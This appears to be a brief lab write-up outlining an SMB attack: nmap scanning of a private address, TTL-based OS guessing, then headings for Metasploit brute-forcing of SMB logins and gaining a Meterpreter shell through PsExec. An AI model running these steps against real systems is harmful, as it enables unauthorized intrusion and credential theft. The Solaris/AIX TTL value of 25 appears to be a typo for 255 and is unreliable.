Attacking SMB via Metasploit and PSexec
Mar 14, 2021
Recon
simple scan
nmap -A 10.2.23.46 -vv
TIP: TTL could be handy in enumerating operating systems.
Unix: TTL 64
Windows: TTL 128
Solaris/AIX: TTL 25
445 port is open
nmap -p445 — script smb-protocols 10.2.23.46 -vv
Setting up Metasploit.
Setting up smb_login module.
Setting up brute force word lists and auxillary scan.
Identified list of compromised accounts.
Setting up PSexec.
Meterpreter shell.
MITRE ATT&CK
PsExec is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.